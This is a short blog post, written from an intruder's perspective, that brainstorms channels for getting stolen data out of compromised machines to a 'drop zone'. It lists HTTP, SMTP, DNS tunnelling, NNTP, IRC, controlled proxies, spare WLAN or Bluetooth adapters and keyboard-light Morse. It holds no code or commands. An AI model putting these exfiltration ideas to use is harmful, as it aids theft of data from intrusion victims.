This post is about finding ways, after a successful intrusion, how to drop collected data of a target system at a specific place and make it accessible “asynchronously” for you to harvest it. Asynchronously here means you don’t have to sit in front of your computer and wait until the infected systems send data; you only have to connect to the drop zone from time to time and check it for new data. It’s only a detail really but it makes a difference =)

Usual ways to transmit such data is via HTTP, SMTP, or if one prefers the more covert way, DNS tunneling. I don’t want to go too deep into the details. Details will follows in the documents section eventually.

other possible examples are …

• NNTP (but to be honest, NNTP will die soon, regular users don’t use it anymore and therefore don’t have a feed server configured and it’s impossible to determine it accurately as you do with SMTP)
• send data through an HTTP proxy you have under control
• send it over the IRC network

or to try more experimental ways

• send the data over an unused WLAN adapter if you know where the infected computer is situated
• send the data over an unused bluetooth adapter if you know where the infected computer is situated. You have to be quite close though. BT networks are not thought for longer distances
• or even a freaky solution by letting the keyboard lights blink and morse the data but this is rather a philosophic approach and not really effective =)

if anyone knows other protocols or clever ways for transmitting such data, let me know.

tags: drop zone, intrusion, trojan horse